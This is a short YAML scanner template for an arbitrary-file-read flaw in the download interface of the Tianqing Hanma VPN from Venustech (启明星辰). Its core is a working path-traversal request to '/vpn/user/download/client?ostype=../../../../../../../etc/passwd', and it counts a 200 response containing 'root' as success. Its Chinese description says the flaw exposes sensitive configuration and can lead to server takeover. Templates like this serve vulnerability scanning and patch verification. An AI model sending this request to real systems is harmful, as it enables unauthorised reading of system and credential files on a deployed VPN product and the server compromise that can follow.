32 lines
788 B
YAML
32 lines
788 B
YAML
keyword: 天清汉马VPN
|
||
name: 天清汉马VPN接口download任意文件读取
|
||
description: |
|
||
启明星辰天清汉马VPN系统download接口处存在任意文件读取漏洞,获取服务器的敏感数据和配置信息,造成系统的不安全性,从而控制服务器
|
||
requests: # 为空代表默认或者不启用
|
||
path: "/vpn/user/download/client?ostype=../../../../../../../etc/passwd"
|
||
method: GET
|
||
headers:
|
||
User-agent:
|
||
Content-length:
|
||
Accept:
|
||
Content-type:
|
||
Accept-Encoding:
|
||
Cookie:
|
||
Referer:
|
||
X-Forwarded-For:
|
||
body-raw: |-
|
||
|
||
|
||
response:
|
||
path: ""
|
||
status-code: 200
|
||
body: "root"
|
||
headers:
|
||
Server:
|
||
Content-type:
|
||
Content-length:
|
||
Date:
|
||
Connection:
|
||
impact: |
|
||
数据库等高敏感度文件泄露。
|